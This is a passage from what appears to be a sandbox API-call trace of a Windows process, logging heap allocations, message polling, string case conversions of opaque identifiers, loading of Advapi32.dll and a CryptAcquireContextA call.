Size=0x20) returned 0x2a77dc8 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.876] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.876] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.876] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0122.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.877] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.877] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0122.877] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.878] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.878] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.878] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.879] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.879] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.879] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0122.879] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.879] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.879] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.880] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0122.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0122.880] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.880] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.880] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.880] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.880] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.880] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0122.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0122.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0122.884] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be890) returned 1 [0122.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.884] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.885] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0122.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.899] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0122.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.899] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0122.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.900] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.900] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.900] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 